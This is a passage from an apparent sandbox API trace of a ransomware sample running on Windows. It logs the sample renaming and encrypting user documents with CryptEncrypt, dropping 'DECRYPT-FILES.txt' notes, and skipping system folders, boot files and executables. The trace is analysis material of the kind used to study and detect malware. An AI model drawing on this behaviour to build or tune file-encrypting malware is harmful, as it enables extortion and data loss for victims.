lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.489] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.489] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.489] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.489] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.489] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.489] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.489] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.489] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.489] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.489] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.489] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.489] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.490] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.490] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.490] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.490] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.490] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.490] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.490] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.490] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.490] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.490] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.490] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.490] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.490] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.490] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.490] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.490] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.490] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.490] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.490] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.490] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.490] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.490] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.490] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.490] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.490] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.490] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.490] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.490] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.490] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.490] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.490] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.490] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.490] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.491] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\AcdcPPw5PxakniwP.docx") returned 96 [0084.491] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\AcdcPPw5PxakniwP.docx.rsFJoR") returned 103 [0084.491] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\AcdcPPw5PxakniwP.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\acdcppw5pxakniwp.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\AcdcPPw5PxakniwP.docx.rsFJoR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\acdcppw5pxakniwp.docx.rsfjor"), dwFlags=0x0) returned 1 [0084.491] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.491] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.492] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.492] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae87bd40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae87bd40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae87bd40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0084.492] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0084.492] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb45722d0, ftCreationTime.dwHighDateTime=0x1d4cf5b, ftLastAccessTime.dwLowDateTime=0xcd0f9e30, ftLastAccessTime.dwHighDateTime=0x1d4d30f, ftLastWriteTime.dwLowDateTime=0xcd0f9e30, ftLastWriteTime.dwHighDateTime=0x1d4d30f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hvIpcfVk", cAlternateFileName="")) returned 1 [0084.492] lstrcmpW (lpString1="hvIpcfVk", lpString2=".") returned 1 [0084.492] lstrcmpW (lpString1="hvIpcfVk", lpString2="..") returned 1 [0084.492] lstrcatW (in: lpString1="hvIpcfVk", lpString2="\\" | out: lpString1="hvIpcfVk\\") returned="hvIpcfVk\\" [0084.492] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpString2="hvIpcfVk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\" [0084.492] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="\\Program Files") returned 0x0 [0084.492] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch=":\\Windows") returned 0x0 [0084.492] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="\\Games\\") returned 0x0 [0084.492] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="\\Tor Browser\\") returned 0x0 [0084.492] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="\\ProgramData\\") returned 0x0 [0084.492] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0084.492] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0084.492] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0084.492] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="\\All Users") returned 0x0 [0084.492] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="\\IETldCache\\") returned 0x0 [0084.492] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="\\Local Settings\\") returned 0x0 [0084.492] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="\\AppData\\Local") returned 0x0 [0084.492] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="AhnLab") returned 0x0 [0084.492] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0084.492] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned 84 [0084.493] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.493] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\\\jkbimi8.tmp") returned 96 [0084.493] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\hvipcfvk\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x438 [0084.493] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned 84 [0084.493] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0084.493] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\\\DECRYPT-FILES.txt") returned 102 [0084.493] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\hvipcfvk\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0084.494] WriteFile (in: hFile=0x43c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0084.495] CloseHandle (hObject=0x43c) returned 1 [0084.495] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned 84 [0084.495] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\*" [0084.495] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb45722d0, ftCreationTime.dwHighDateTime=0x1d4cf5b, ftLastAccessTime.dwLowDateTime=0xae8ee160, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae8ee160, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b58 [0084.495] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.495] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb45722d0, ftCreationTime.dwHighDateTime=0x1d4cf5b, ftLastAccessTime.dwLowDateTime=0xae8ee160, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae8ee160, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.495] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.496] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.496] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe435c0d0, ftCreationTime.dwHighDateTime=0x1d4cbee, ftLastAccessTime.dwLowDateTime=0xf3618280, ftLastAccessTime.dwHighDateTime=0x1d4cbb5, ftLastWriteTime.dwLowDateTime=0xf3618280, ftLastWriteTime.dwHighDateTime=0x1d4cbb5, nFileSizeHigh=0x0, nFileSizeLow=0x11bb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="8x_O2ZZ-dI_F.rtf", cAlternateFileName="8X_O2Z~1.RTF")) returned 1 [0084.496] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.rtf", lpString2="DECRYPT-FILES.txt") returned -1 [0084.496] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.rtf", lpString2="autorun.inf") returned -1 [0084.496] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.rtf", lpString2="boot.ini") returned -1 [0084.496] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.rtf", lpString2="desktop.ini") returned -1 [0084.496] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.rtf", lpString2="ntuser.dat") returned -1 [0084.496] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.rtf", lpString2="iconcache.db") returned -1 [0084.496] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.rtf", lpString2="bootsect.bak") returned -1 [0084.496] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.rtf", lpString2="ntuser.dat.log") returned -1 [0084.496] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.rtf", lpString2="thumbs.db") returned -1 [0084.496] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.rtf", lpString2="Bootfont.bin") returned -1 [0084.496] lstrlenW (lpString="8x_O2ZZ-dI_F.rtf") returned 16 [0084.496] lstrcmpiW (lpString1="rtf", lpString2="lnk") returned 1 [0084.496] lstrcmpiW (lpString1="rtf", lpString2="exe") returned 1 [0084.496] lstrcmpiW (lpString1="rtf", lpString2="sys") returned -1 [0084.496] lstrcmpiW (lpString1="rtf", lpString2="dll") returned 1 [0084.496] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned 84 [0084.496] lstrlenW (lpString="8x_O2ZZ-dI_F.rtf") returned 16 [0084.496] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\" [0084.496] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\", lpString2="8x_O2ZZ-dI_F.rtf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\8x_O2ZZ-dI_F.rtf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\8x_O2ZZ-dI_F.rtf" [0084.496] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.496] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\hvIpcfVk\\8x_O2ZZ-dI_F.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\hvipcfvk\\8x_o2zz-di_f.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0084.497] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2d978 | out: lpFileSize=0x3f2d978*=72632) returned 1 [0084.497] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0084.497] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.497] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.497] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.497] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.497] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2d8e0*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2d8e0*=0x100) returned 1 [0084.497] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0084.499] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.499] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.500] CloseHandle (hObject=0x444) returned 1 [0084.500] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.500] WriteFile (in: hFile=0x440, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d900, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2d900*=0x108, lpOverlapped=0x0) returned 1 [0084.501] CloseHandle (hObject=0x0) returned 0 [0084.501] CloseHandle (hObject=0x440) returned 1 [0084.501] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.501] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.501] GetTickCount () returned 0x114d95f [0084.501] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.509] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.510] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.510] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.510] lstrlenA (lpString="kernel32.dll") returned 12 [0084.510] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.510] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.510] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.510] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.510] lstrlenA (lpString="ADDATOMA") returned 8 [0084.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.510] lstrlenA (lpString="ADDATOMW") returned 8 [0084.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.510] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.510] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.511] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.511] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.511] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.511] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.511] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.511] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.511] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.511] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.511] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.511] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.511] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.511] 